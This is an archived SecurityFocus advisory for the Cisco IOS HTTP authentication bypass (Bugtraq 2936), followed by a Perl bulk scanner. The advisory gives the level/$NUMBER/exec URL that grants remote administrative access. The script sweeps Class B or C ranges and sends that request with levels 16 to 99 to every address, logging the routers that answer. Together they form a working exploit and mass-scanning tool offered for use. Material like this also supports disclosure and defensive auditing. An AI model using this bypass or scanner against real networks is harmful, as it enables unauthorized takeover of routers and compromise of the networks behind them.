source: http://www.securityfocus.com/bid/2936/info
  
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
  
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
  
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 

#!/usr/bin/perl
#
# Bulk Scanner for the Cisco IOS HTTP Configuration Arbitrary
# Administrative Access Vulnerability
# Found: 06-27-01 - Bugtraq ID: 2936
# Written by hypoclear on 07-03-01
#
# usage: ./IOScan.pl <start ip> <end ip>
# Note: start and end ip must be a Class B or C network
# example: ./IOScan 192.168.0.0 192.168.255.255
#
# hypoclear - hypoclear@jungle.net - http://hypoclear.cjb.net
# This and all of my programs fall under my disclaimer, which
# can be found at: http://hypoclear.cjb.net/hypodisclaim.txt

use IO::Socket; 

die "\nusage: $0 <start ip> <end ip>
Note:  start and end ip must be a Class B or C network
ex:   ./IOScan 192.168.0.0 192.168.255.255\n\n" unless @ARGV > 0;
$num = 16; $ipcount = 0; $vuln = 0;

if (defined $ARGV[1])
 { $currentIP = $ARGV[0]; $endIP = $ARGV[1];
   while(1)
    { @CURIP = split(/\./,$currentIP);
      if (($CURIP[2] > 255) && ($CURIP[3] > 255))
       { scanEnd();
       }
      print "Scanning $currentIP\n";
      scan($currentIP);
      if ($currentIP eq $endIP)
       { scanEnd();
       }
      if ($CURIP[3] < 255)
       { $CURIP[3]++;
       }
      else
       { $CURIP[2]++;
         $CURIP[3]=0;
       }
      $currentIP = "";
      foreach $item (@CURIP)
        { $currentIP .= "$item.";
        }
      $currentIP =~ s/\.$//;
      $ipcount++;
     }
 }


sub scan
  { while ($num <100)
      { $IP = $_[0];
        sender("GET /level/$num/exec/- HTTP/1.0\n\n");
        if ($webRecv =~ /200 ok/)
         { $vuln++;
           open(OUT,">>ios.out") || die "Can't write to file";
           print OUT "$IP is Vulnerable\n";
           close(OUT);
           $num = 101;
         }
        $num++;
      }
     $num = 16;
  }


sub sender
  { $sendsock = IO::Socket::INET -> new(Proto     => 'tcp',
                                        PeerAddr  => $IP,
                                        PeerPort  => 80,
                                        Type      => SOCK_STREAM,
                                        Timeout   => 1);
        unless($sendsock){die "Can't connect to $ARGV[0]"}
   $sendsock->autoflush(1);

   $sendsock -> send($_[0]);
   $webRecv = ""; while(<$sendsock>){$webRecv .= $_} $webRecv =~ s/\n//g;
   close $sendsock;
  }


sub scanEnd
  { print "\nScanned $ipcount ip addresses, $vuln addresses found vulnerable.\n";
    if ($vuln > 0) {print "Check ios.out for vulnerable addresses.";}
    die "\n";
  }
